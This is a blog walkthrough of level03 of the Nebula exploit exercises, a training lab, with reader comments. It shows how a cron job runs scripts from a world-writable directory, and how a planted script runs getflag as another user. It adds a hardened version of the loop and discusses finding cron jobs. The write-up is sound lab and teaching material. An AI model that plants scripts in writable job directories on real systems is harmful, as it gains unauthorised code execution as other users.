Nebula exploit exercises walkthrough – level03

level03

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

cron is a utility used to run tasks periodically, found in nearly every distro.

In /home/flag03, we have a script – writable.sh – and a directory – writable.d.

level03@nebula:/home/flag03$ ls -sl
total 1
0 drwxrwxrwx 1 flag03 flag03 40 2014-06-03 03:39 writable.d
1 -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh

Let’s take a look at writable.sh:

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

This is fairly simple – for each file in the writable.d directory, run it with bash, and then delete it. bash -x runs the script in trace mode, printing each command as it is executed. I think we can ignore ulimit -t 5 – it just limits the CPU time available to the shell, possibly to stop a malicious script consuming excess resources.

Note that the writable.d directory is world-writable (drwxrwxrwx) – so any user, including level03, can just put a script in there:

level03@nebula:~$ cat getflag.sh 
#!/bin/sh

/bin/getflag >> /tmp/flag03.out
level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/

Then wait a short while, assuming that the writable.sh script is the one being run by cron…

level03@nebula:/tmp$ ls -sl
total 4
4 -rw-rw-r-- 1 flag03 flag03 59 2014-06-04 09:39 flag03.out
level03@nebula:/tmp$ cat flag03.out 
You have successfully executed getflag on a target account
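
The root cause is a job running as flag03 that executes whatever any user drops into a world-writable directory. As an added example (not part of the original post or of the Nebula exercise), here is a hardened form of the writable.sh loop that refuses a loosely-permissioned directory and skips any file the job's user does not solely control. The function names is_loose and run_dropdir are hypothetical, and entries are run with sh rather than bash -x.

```sh
#!/bin/sh
# Added example: hardened counterpart of the loop in writable.sh.
# is_loose and run_dropdir are hypothetical names, not from the exercise.

# True if PATH is writable by group or other (e.g. the drwxrwxrwx writable.d).
is_loose() {
    [ -n "$(find "$1" -maxdepth 0 \( -perm -0020 -o -perm -0002 \) 2>/dev/null)" ]
}

# Run the scripts in DIR only if DIR and each script are owned by the user the
# job runs as and nobody else can write to them. Returns 1 if DIR is refused.
run_dropdir() {
    dir=$1
    if [ -L "$dir" ] || [ ! -d "$dir" ] || [ ! -O "$dir" ] || is_loose "$dir"; then
        echo "REFUSE $dir: must be a real directory writable only by its owner" >&2
        return 1
    fi
    for f in "$dir"/*; do
        [ -e "$f" ] || continue      # empty directory: the glob stays literal
        if [ -L "$f" ] || [ ! -f "$f" ] || [ ! -O "$f" ] || is_loose "$f"; then
            echo "SKIP $f: not a regular file controlled solely by this user" >&2
            continue
        fi
        # Same CPU limit as the original loop; sh instead of bash -x.
        (ulimit -t 5; sh "$f")
    done
    return 0
}
```

Run against the directory from this level, run_dropdir /home/flag03/writable.d returns 1 without executing anything, because the directory mode is 777.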

Aside

Now – this is all well and good, but if we weren’t told that the script was run by cron, what could we do?

There is a root user in the Nebula VM, and using that I can do:

nebula@nebula:/var/spool/cron$ sudo crontab -u flag03 -l
*/3 * * * * /home/flag03/writable.sh

But I can’t do that as level03:

level03@nebula:/tmp$ crontab -u flag03 -l
must be privileged to use -u

Also, I could use ps to see that the process runs, but that would presume that I knew it was cron’ed anyway.

So, not sure how I would go about finding cron jobs as an unprivileged user.

I’ve asked on the Unix Stack Exchange.

7 thoughts on “Nebula exploit exercises walkthrough – level03”

  1. lollipoponlips

    October 16, 2016 at 9:18pm

    I’ve just started to do these exercises. I’m confused:

    1) what is the objective exactly?

  2. […] the cleanest, but it works to get the flag. I had the same thought as Cybergibbons though, (see this article) and from what I see of his findings, the only way to detect cronjobs if you don’t have […]

  3. Shinko

    May 6, 2017 at 12:47am

    For fun, I decided to try and one-Liner it:
    echo -e '#!/usr/bin/bash\n\n/bin/getflag>/home/flag03/got_result.txt\n'>/home/flag03/writable.d/get_flag.sh;chmod +x /home/flag03/writable.d/get_flag.sh

  4. emily

    November 18, 2017 at 12:30am

    level03@nebula:~$ cat getfile.sh
    level03@nebula:~$ cat: getflag.sh: No such file or directory

    ??

  5. emily

    November 18, 2017 at 12:32am

    level03@nebula:~$ cat getflag.sh
    level03@nebula:~$ cat: getflag.sh: No such file or directory.

    What am I doing wrong?

    • evan

      December 27, 2017 at 5:23pm

      Did you create the getflag.sh script, and is it located in your home directory?

    • manuelh

      March 29, 2018 at 7:56pm

      Try the following:
      level03@nebula:~$ cat > getflag.sh
      #!/bin/sh

      /bin/getflag >> /tmp/flag03.out

      level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/
